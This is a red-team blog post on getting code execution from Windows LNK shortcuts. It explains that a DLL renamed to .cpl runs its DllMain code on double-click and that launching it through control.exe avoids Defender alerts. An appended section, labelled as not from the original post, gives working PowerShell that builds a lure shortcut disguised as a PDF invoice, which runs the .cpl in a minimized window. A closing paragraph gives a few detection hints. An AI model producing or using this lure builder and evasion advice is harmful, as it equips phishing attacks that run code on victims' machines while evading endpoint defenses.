Home Grown Red Team: LNK Phishing Revisited In 2023
All right, so macros are out, and ISOs, ZIPs and password-protected ZIPs are all getting flagged. What's an APT to do? Well, LNK files are still going strong against certain defenses. I've done a few posts about using LNK files and batch scripts in OneNote, but Microsoft has officially given command execution from OneNote files the boot. In this write-up, we're going to explore a few different ways to get code execution from LNK files with some familiar tools from previous posts.
This isn't going to go super in-depth with crazy evasion techniques, and these methods probably won't work against heavy-duty EDR, but we're going to test them against Microsoft Defender for Endpoint (trial edition). This is just a PoC, so we're going to use lnk2pwn and a PowerShell one-liner. Should you use this in a real engagement, I would do some more research on using a LOLBIN with more evasive command execution.
A CPL file is a Control Panel item. If you're wondering how to make one, just build a DLL and rename it with the .cpl file extension. A proper applet exports a CPlApplet function for the Control Panel to call, but a renamed DLL without that export still gets loaded by LoadLibrary, so whatever you put in DllMain runs on process attach. The .cpl extension lets the target double-click the file for execution instead of you having to launch rundll32.exe yourself. CPL files are opened by control.exe, which hands the file off to a few other LOLBINs, including rundll32.exe (rundll32.exe shell32.dll,Control_RunDLL "file.cpl"). Defender doesn't seem to mind if rundll32 is launched from control.exe, only if you run rundll32 from PowerShell.
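To tie the CPL trick to the LNK delivery this post is about, here is an added example (not code from the original post, and not from lnk2pwn) that builds the shortcut with the WScript.Shell COM object. The shortcut's target is control.exe with the .cpl path as its argument, so a double-click produces the control.exe -> rundll32.exe chain described above rather than a PowerShell -> rundll32 chain. The file paths, lure name and icon index are assumptions for a lab; the .cpl itself is whatever DLL you renamed.

```powershell
# Added example: build an LNK that launches a CPL through control.exe.
# Paths and names below are assumptions for a lab, not from the original post.

$CplPath = 'C:\Users\Public\invoice.cpl'          # assumed: your renamed DLL
$LnkPath = 'C:\Users\Public\Invoice_Q3.pdf.lnk'   # assumed: Explorer always hides ".lnk", so this shows as Invoice_Q3.pdf

function New-CplShortcut {
    param(
        [Parameter(Mandatory)] [string] $Lnk,
        [Parameter(Mandatory)] [string] $Cpl,
        [string] $IconDll   = (Join-Path $env:SystemRoot 'System32\shell32.dll'),
        [int]    $IconIndex = 1    # assumed: pick whatever icon index matches the lure
    )
    $control = Join-Path $env:SystemRoot 'System32\control.exe'

    $ws = New-Object -ComObject WScript.Shell
    $sc = $ws.CreateShortcut($Lnk)
    $sc.TargetPath       = $control
    # control.exe "<path>.cpl" in turn spawns:
    #   rundll32.exe shell32.dll,Control_RunDLL "<path>.cpl"
    $sc.Arguments        = "`"$Cpl`""
    $sc.WorkingDirectory = Split-Path -Path $Cpl -Parent
    $sc.IconLocation     = "$IconDll,$IconIndex"
    $sc.WindowStyle      = 7            # 7 = start minimized, so nothing flashes on screen
    $sc.Description      = 'Invoice'    # tooltip text when hovering the shortcut
    $sc.Save()
    return $sc
}

function Get-ShortcutTarget {
    # Read the LNK back; CreateShortcut on an existing .lnk loads it instead of creating it.
    param([Parameter(Mandatory)] [string] $Lnk)
    $ws = New-Object -ComObject WScript.Shell
    $sc = $ws.CreateShortcut($Lnk)
    [pscustomobject]@{
        Target    = $sc.TargetPath
        Arguments = $sc.Arguments
        Icon      = $sc.IconLocation
    }
}

$null = New-CplShortcut -Lnk $LnkPath -Cpl $CplPath
Get-ShortcutTarget -Lnk $LnkPath | Format-List
```

Get-ShortcutTarget is also the quickest way to check a suspicious LNK from the defensive side before anyone clicks it: a target of control.exe or rundll32.exe with an argument pointing outside System32 is the tell. On the endpoint, the same chain shows up as explorer.exe -> control.exe -> rundll32.exe with Control_RunDLL and a user-writable .cpl path on the rundll32 command line, which is what you would key a detection on.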